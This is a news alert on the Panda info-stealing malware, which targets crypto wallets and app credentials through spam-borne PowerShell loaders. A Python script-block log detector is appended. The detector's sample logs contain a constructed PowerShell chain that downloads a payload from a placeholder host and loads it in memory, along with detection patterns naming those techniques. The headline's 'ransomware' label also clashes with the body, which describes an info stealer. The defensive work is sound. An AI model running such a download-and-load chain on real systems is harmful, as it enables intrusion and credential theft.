
New Ransomware ‘Panda’ Affecting Crypto Wallets – ALERT.

A new ransomware attack now goes after cryptocurrency wallets, alongside account credentials from other apps like NordVPN, Telegram, Discord, and Steam.

Referred to as “Panda,” the new information-stealing malware (“info stealer” for short) was discovered by Trend Micro, a renowned cybersecurity firm.

“Cryptocurrency wallets are now as big of a target for online theft as banking accounts are,” outlined the Trend Micro researchers who discovered the attack. “With more people stepping into cryptocurrencies and the values of said crypto assets still increasing, this may only become a greater threat moving forward.”

They also pointed out that the risk is greater here because, unlike theft through a bank or a credit card, there may be no central authority that can reverse malicious transactions. Once the funds are gone and the transaction is recorded on the blockchain, they are most likely gone for good.

At a high level, according to the researchers, the attack begins with spam messages carrying a malicious attachment. The attachment uses PowerShell (Microsoft’s task automation and configuration management scripting language) to download the actual Panda Stealer malware in encoded form, which is then loaded filelessly onto the affected system.

“None of this is particularly novel in and of itself – malicious Office documents are documented, so is fileless loading,” added the researchers. “The main ‘new’ aspect here is the target of the info theft.”

Beyond just targeting crypto wallets with malware, attackers are now setting their sights on apps like Discord and Telegram – popular communications platforms for cryptocurrency communities.

The attack campaign, which was active earlier in April, uses spam emails and the same rare fileless distribution method as a separate recent attack. Morphisec, another cybersecurity firm, discovered a Phobos ransomware campaign earlier in April that uses a similar fileless distribution method to Panda’s, making it harder for security tools to identify.

“The fileless distribution utilized in this case means there’s no signature for antivirus software to detect the threat, and it can bypass detection,” outlined Michael Gorelik, CTO and head of threat intelligence at Morphisec. “Moreover, it’s dangerous for both users’ wallets and even enterprises, with more lines of security set up.”
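Because a payload that is fetched in encoded form and loaded straight into memory leaves no file for signature-based antivirus to scan, defenders lean on behaviour instead: PowerShell script-block logging records what actually ran. The following is an added example, not code from the article, Trend Micro or Morphisec; it assumes Windows event ID 4104-style log lines (the line layout, the sample script text and the URL are constructed) and flags a download / decode / in-memory-load chain occurring within a few consecutive script blocks.

```python
import re

# Constructed script-block log lines in a simplified "4104 ScriptBlockText=..." layout.
# They are not real Panda Stealer samples; the URL is a placeholder.
SAMPLE_LOG = [
    "4104 ScriptBlockText=Get-ChildItem C:\\Users\\alice\\Documents",
    "4104 ScriptBlockText=$d=(New-Object Net.WebClient).DownloadString('https://example.invalid/p.txt')",
    "4104 ScriptBlockText=$b=[Convert]::FromBase64String($d)",
    "4104 ScriptBlockText=[Reflection.Assembly]::Load($b)",
    "4104 ScriptBlockText=Write-Host 'done'",
]

# Heuristic indicators for the three stages the article describes: fetch an encoded
# payload, decode it, run it without writing a file. A constructed rule, not a vendor signature.
STAGES = {
    "download": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I),
    "decode": re.compile(r"FromBase64String|-EncodedCommand|-enc\b", re.I),
    "in_memory_load": re.compile(r"Reflection\.Assembly\]::Load|Invoke-Expression|\bIEX\b", re.I),
}


def parse_line(line):
    """Split one log line into (event_id, script_text); None if it is not a script-block record."""
    m = re.match(r"^(\d+)\s+ScriptBlockText=(.*)$", line)
    return (int(m.group(1)), m.group(2)) if m else None


def stages_in(script):
    """Set of stage names whose indicator appears in one script block."""
    return {name for name, pat in STAGES.items() if pat.search(script)}


def find_fileless_chains(lines, window=5):
    """Return (start_idx, end_idx, stages) for each run of at most `window` consecutive
    4104 records in which all three stages appear. A window only starts at a record that
    itself matches a stage, so one chain is reported once rather than per preceding line."""
    parsed = [parse_line(l) for l in lines]
    hits = []
    for i, p in enumerate(parsed):
        if p is None or p[0] != 4104 or not stages_in(p[1]):
            continue
        seen = set()
        for j in range(i, min(i + window, len(parsed))):
            if parsed[j] is None or parsed[j][0] != 4104:
                continue
            seen |= stages_in(parsed[j][1])
            if seen == set(STAGES):
                hits.append((i, j, frozenset(seen)))
                break
    return hits
```

A single download or a single base64 decode in isolation is not flagged, which keeps ordinary administration scripts out of the alert queue; tune `window` to how chatty the logging on a given host is.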
